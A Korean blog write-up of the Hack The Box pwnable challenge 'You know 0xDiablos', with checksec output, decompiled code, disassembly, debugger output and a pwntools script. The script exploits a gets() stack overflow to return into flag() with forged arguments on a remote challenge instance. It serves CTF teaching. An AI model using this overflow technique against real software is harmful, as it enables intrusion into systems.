์ƒ์„ธ ์ปจํ…์ธ 

๋ณธ๋ฌธ ์ œ๋ชฉ

[Hack The Box] Pwnable - You know 0xDiablos

HACK THE BOX

by koharin 2022. 1. 3. 01:45

๋ณธ๋ฌธ


๐Ÿ’ก CHALLENGE DESCRIPTION

I missed my flag

 

โœ”๏ธ checksec ํ™•์ธ

$ checksec --file=vuln 
[*] Checking for new versions of pwntools
    To disable this functionality, set the contents of /home/koharin/.cache/.pwntools-cache-3.8.
    Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wi:
        [update]
        interval=never
[*] You have the latest version of Pwntools (4.7.0)
[*] '/home/koharin/HackTheBox/You_know_0xDiablos/vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

canary๋„ ์—†๊ณ , ๋ณ„๋‹ค๋ฅธ ๋ณดํ˜ธ๊ธฐ๋ฒ•์ด ์ ์šฉ๋˜์–ด ์žˆ์ง€ ์•Š์€ 32bit ๋ฐ”์ด๋„ˆ๋ฆฌ์ด๋‹ค.

 

 

๐Ÿ” ์ฝ”๋“œ ๋ถ„์„

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __gid_t v3; // ST1C_4

  setvbuf(stdout, 0, 2, 0);    // mode 2 is _IONBF on glibc: stdout is unbuffered, so the prompt below is flushed before the read
  v3 = getegid();
  setresgid(v3, v3, v3);       // real/effective/saved gid all set to the effective gid (presumably a setgid challenge binary, so flag.txt stays readable)
  puts("You know who are 0xDiablos: ");
  vuln();                      // all untrusted input is consumed here; nothing in main() bounds it
  return 0;
}

main ํ•จ์ˆ˜์—์„œ ์ŠคํŠธ๋ง์„ ์ถœ๋ ฅํ•˜๊ณ  vuln ํ•จ์ˆ˜๋ฅผ ํ˜ธ์ถœํ•œ๋‹ค.

int vuln()
{
  char s; // [esp+0h] [ebp-B8h]  -- the buffer starts 0xB8 bytes below the saved ebp; the decompiler only shows its first byte

  gets(&s);          // unbounded read: gets() has no length argument and stops only at '\n' or EOF, so input longer than 0xB8 bytes overwrites SFP and the return address (no canary, see checksec)
  return puts(&s);   // echoes the input back; the overwritten return address takes effect when this function returns
}

vuln ํ•จ์ˆ˜์—์„œ๋Š” gets ํ•จ์ˆ˜๋กœ ๋ฒ„ํผ s์— ์ž…๋ ฅ๋ฐ›๋Š”๋‹ค.

gets ํ•จ์ˆ˜์˜ ๊ฒฝ์šฐ ์ž…๋ ฅ ๊ธธ์ด๋ฅผ ๊ฒ€์‚ฌํ•˜์ง€ ์•Š์•„ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ทจ์•ฝ์ ์ด ์กด์žฌํ•œ๋‹ค.

 

char *__cdecl flag(int a1, int a2)
{
  char *result; // eax
  char s; // [esp+Ch] [ebp-4Ch]   -- 0x40 bytes between s and stream, which matches the fgets() bound of 64 below
  FILE *stream; // [esp+4Ch] [ebp-Ch]

  stream = fopen("flag.txt", (const char *)&unk_804A008);   // unk_804A008 is the mode string (not shown in this listing; presumably "r")
  if ( !stream )
  {
    puts("Hurry up and try in on server side.");             // no flag.txt next to the binary -> exit; only the remote instance has the file
    exit(0);
  }
  result = fgets(&s, 64, stream);                            // flag is read BEFORE the argument check; return value unchecked (s stays uninitialized on an empty file) and stream is never fclose()d
  if ( a1 == 0xDEADBEEF && a2 == 0xC0DED00D )                // both stack arguments ([ebp+8] and [ebp+0xC]) must match; the exploit forges them in the overflowed frame
    result = (char *)printf(&s);                             // format-string bug: file content is used as the format string; harmless as long as the flag contains no '%', but a genuine vulnerability pattern
  return result;
}

flag ํ•จ์ˆ˜๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋Š”๋ฐ, flag ํ•จ์ˆ˜์˜ ์ธ์ž a1์ด 0xDEADBEEF ๊ทธ๋ฆฌ๊ณ  a2๊ฐ€ 0xC0DED00D์ธ ๊ฒฝ์šฐ์— flag๋ฅผ ์ถœ๋ ฅํ•ด์ค€๋‹ค.

.text:080491E2 flag            proc near
.text:080491E2
.text:080491E2 s               = byte ptr -4Ch
.text:080491E2 stream          = dword ptr -0Ch
.text:080491E2 var_4           = dword ptr -4
.text:080491E2 arg_0           = dword ptr  8
.text:080491E2 arg_4           = dword ptr  0Ch
.text:080491E2
.text:080491E2 ; __unwind {
.text:080491E2                 push    ebp
.text:080491E3                 mov     ebp, esp
.text:080491E5                 push    ebx
.text:080491E6                 sub     esp, 54h
.text:080491E9                 call    __x86_get_pc_thunk_bx
.text:080491EE                 add     ebx, 2E12h
.text:080491F4                 sub     esp, 8
.text:080491F7                 lea     eax, (unk_804A008 - 804C000h)[ebx]
.text:080491FD                 push    eax             ; modes
.text:080491FE                 lea     eax, (aFlagTxt - 804C000h)[ebx] ; "flag.txt"
.text:08049204                 push    eax             ; filename
.text:08049205                 call    _fopen
.text:0804920A                 add     esp, 10h
.text:0804920D                 mov     [ebp+stream], eax
.text:08049210                 cmp     [ebp+stream], 0
.text:08049214                 jnz     short loc_8049232
.text:08049216                 sub     esp, 0Ch
.text:08049219                 lea     eax, (aHurryUpAndTryI - 804C000h)[ebx] ; "Hurry up and try in on server side."
.text:0804921F                 push    eax             ; s
.text:08049220                 call    _puts
.text:08049225                 add     esp, 10h
.text:08049228                 sub     esp, 0Ch
.text:0804922B                 push    0               ; status
.text:0804922D                 call    _exit
.text:08049232 ; ---------------------------------------------------------------------------
.text:08049232
.text:08049232 loc_8049232:                            ; CODE XREF: flag+32↑j
.text:08049232                 sub     esp, 4
.text:08049235                 push    [ebp+stream]    ; stream
.text:08049238                 push    40h             ; n
.text:0804923A                 lea     eax, [ebp+s]
.text:0804923D                 push    eax             ; s
.text:0804923E                 call    _fgets
.text:08049243                 add     esp, 10h
.text:08049246                 cmp     [ebp+arg_0], 0DEADBEEFh
.text:0804924D                 jnz     short loc_8049269
.text:0804924F                 cmp     [ebp+arg_4], 0C0DED00Dh
.text:08049256                 jnz     short loc_804926C
.text:08049258                 sub     esp, 0Ch
.text:0804925B                 lea     eax, [ebp+s]
.text:0804925E                 push    eax             ; format
.text:0804925F                 call    _printf
.text:08049264                 add     esp, 10h
.text:08049267                 jmp     short loc_804926D

์ด๋•Œ flag๋ฅผ ์ถœ๋ ฅํ•ด์ฃผ๋Š” ์กฐ๊ฑด์ด ์žˆ๋Š”๋ฐ, flag ํ•จ์ˆ˜ ์ธ์ž๋กœ 0x8 ์œ„์น˜์— 0xDEADBEEF๋ฅผ, 0xC ์œ„์น˜์— 0xC0DED00D ์ฃผ์–ด์•ผ ํ•œ๋‹ค.

 

์ด ์ •๋ณด๋กœ ์ƒ๊ฐํ•ด๋ณผ ์ˆ˜ ์žˆ๋Š” ์‹œ๋‚˜๋ฆฌ์˜ค๋Š” stack buffer overflow ์ทจ์•ฝ์ ์œผ๋กœ return address๋ฅผ flag ์ฃผ์†Œ๋กœ ๋ฎ๊ณ , flag ์ธ์ž ์กฐ๊ฑด์„ ๋งŒ์กฑํ•ด์„œ ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ค˜์„œ flag๋ฅผ ์ถœ๋ ฅํ•˜๋Š” ๊ฒƒ์ด๋‹ค.

 

 

๐Ÿšฉ Exploit

Exploit Flow

x86์˜ ๊ฒฝ์šฐ x64์™€ ๋‹ค๋ฅด๊ฒŒ stack์—์„œ buffer + SFP + return address ๊ตฌ์กฐ์—์„œ buffer + SFP ์‚ฌ์ด์— dummy ๋ฐ์ดํ„ฐ๊ฐ€ ์กด์žฌํ•  ์ˆ˜ ์žˆ๋‹ค. ๋”ฐ๋ผ์„œ ๋””์ปดํŒŒ์ผ๋Ÿฌ๋กœ ํ™•์ธํ•œ s ๋ฒ„ํผ์˜ 0xB8 ์˜คํ”„์…‹์ด ์ •ํ™•ํ•œ buffer ์˜คํ”„์…‹์ด ์•„๋‹ ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ๋””๋ฒ„๊น…์œผ๋กœ stack ๊ตฌ์กฐ๋ฅผ ํ™•์ธํ•ด๋ณธ๋‹ค.

s ๋ฒ„ํผ์— 'A'*0xB8์„ ์ค€ ํ›„ ๋””๋ฒ„๊น…์„ ํ•ด๋ณธ๋‹ค.

pwndbg> search 'AAAA'
[heap]          0x8f471a0 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[...]
[stack]         0xffdae4e0 0x41414141 ('AAAA')
[stack]         0xffdae4e4 0x41414141 ('AAAA')

์Šคํƒ ๋‚ด ๋ฐ์ดํ„ฐ ์œ„์น˜๋ฅผ ํ™•์ธํ•˜๊ณ , ํ•ด๋‹น ์œ„์น˜์—์„œ stack ๊ตฌ์กฐ๋ฅผ ํ™•์ธํ•ด๋ณธ๋‹ค.

(๋ฐ”๋กœ ๋ฐ์ดํ„ฐ๊ฐ€ ๋“ค์–ด๊ฐ„ ์Šคํƒ ์ฃผ์†Œ๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์—†์–ด์„œ search๋ฅผ ์‚ฌ์šฉํ–ˆ๋‹ค.)

 

'A'*0xB8์˜ buffer ๋ฐ์ดํ„ฐ ๋’ค์— SFP 4๋ฐ”์ดํŠธ์™€ return address 4๋ฐ”์ดํŠธ๊ฐ€ ์œ„์น˜ํ•œ๋‹ค.

๋ณ„๋‹ค๋ฅธ dummy ๋ฐ์ดํ„ฐ ์—†์ด buffer(0xB8) + SFP(4) + return address(4) ๊ตฌ์กฐ์ž„์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.

 

๊ทธ๋Ÿผ flag ์ฃผ์†Œ๋ฅผ ๊ตฌํ•˜๊ณ  ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ž‘์„ฑํ•˜๋ฉด flag๋ฅผ ๊ตฌํ•  ์ˆ˜ ์žˆ๋‹ค.

$ objdump -d vuln | grep -B3 "flag"
080491e0 <frame_dummy>:
 80491e0:	eb 8e                	jmp    8049170 <register_tm_clones>

080491e2 <flag>:
--
 804920a:	83 c4 10             	add    $0x10,%esp
 804920d:	89 45 f4             	mov    %eax,-0xc(%ebp)
 8049210:	83 7d f4 00          	cmpl   $0x0,-0xc(%ebp)
 8049214:	75 1c                	jne    8049232 <flag+0x50>
--
 804923e:	e8 0d fe ff ff       	call   8049050 <fgets@plt>
 8049243:	83 c4 10             	add    $0x10,%esp
 8049246:	81 7d 08 ef be ad de 	cmpl   $0xdeadbeef,0x8(%ebp)
 804924d:	75 1a                	jne    8049269 <flag+0x87>
 804924f:	81 7d 0c 0d d0 de c0 	cmpl   $0xc0ded00d,0xc(%ebp)
 8049256:	75 14                	jne    804926c <flag+0x8a>
--
 804925e:	50                   	push   %eax
 804925f:	e8 cc fd ff ff       	call   8049030 <printf@plt>
 8049264:	83 c4 10             	add    $0x10,%esp
 8049267:	eb 04                	jmp    804926d <flag+0x8b>
 8049269:	90                   	nop
 804926a:	eb 01                	jmp    804926d <flag+0x8b>

ASLR์ด ๊ฑธ๋ ค์žˆ์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— objdump ๋ช…๋ น์–ด๋ฅผ ํ†ตํ•ด flag ์ฃผ์†Œ๋ฅผ ๊ตฌํ•ด์ค€๋‹ค.

flag ์ฃผ์†Œ: 0x080491e2

 

Exploit Code

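#!/usr/bin/env python3
from pwn import *

# Exploit for HTB "You know 0xDiablos": overflow the gets() buffer in vuln(),
# return into flag() with a forged frame carrying the two magic arguments.
context.log_level = 'debug'
context.binary = elf = ELF("./vuln")   # i386 little-endian, so p32() produces the right byte order
#p = process("./vuln")
p = remote('142.93.40.197', 31743)     # HTB instance address/port are ephemeral; update before running

# Resolved from the ELF instead of hard-coding 0x080491e2; valid because the binary is No PIE.
flag = elf.symbols['flag']
log.info("flag: " + hex(flag))

# s is at [ebp-0xB8] in vuln(); debugging confirmed no padding between the buffer and the saved ebp.
BUF_TO_RET = 0xB8 + 4

# Bytes throughout: a str payload would rely on pwntools' implicit encoding of
# non-ASCII characters, which is fragile. None of these words contain 0x0a,
# which matters because gets() stops reading at a newline.
pay  = b'A' * BUF_TO_RET
pay += p32(flag)         # overwrites vuln()'s return address -> flag()
pay += b'B' * 4          # fake return address for flag() ([ebp+4]); the crash after printf is irrelevant
pay += p32(0xDEADBEEF)   # arg_0 ([ebp+8])
pay += p32(0xC0DED00D)   # arg_4 ([ebp+0xC])

p.sendlineafter(b": \n", pay)

p.interactive()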

buffer + SFP(0xB8+4) + return address(flag) + BBBB(dummy) + DEADBEEF(인자, +8 위치) + C0DED00D(인자, +0xC 위치)로 페이로드를 준다. BBBB는 flag 함수가 call로 호출된 것처럼 보이게 하는 가짜 return address로, flag 함수 입장에서 [ebp+4] 자리에 오기 때문에 그 뒤의 두 값이 각각 [ebp+8], [ebp+0xC], 즉 arg_0과 arg_4가 된다. flag를 출력한 뒤 0x42424242로 리턴하며 크래시가 나지만 이미 flag를 받은 뒤이므로 상관없다.

 

์œ„์˜ exploit code ์‹คํ–‰ ์‹œ flag๋ฅผ ์–ป์„ ์ˆ˜ ์žˆ๋‹ค.

 


'HACK THE BOX' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[Hack The Box] Machine - Cap  (0) 2021.10.02
[Hack The Box] Web - Templated  (0) 2021.09.11
[Hack The Box] Mobile - Cat  (0) 2021.09.11

๊ด€๋ จ๊ธ€ ๋”๋ณด๊ธฐ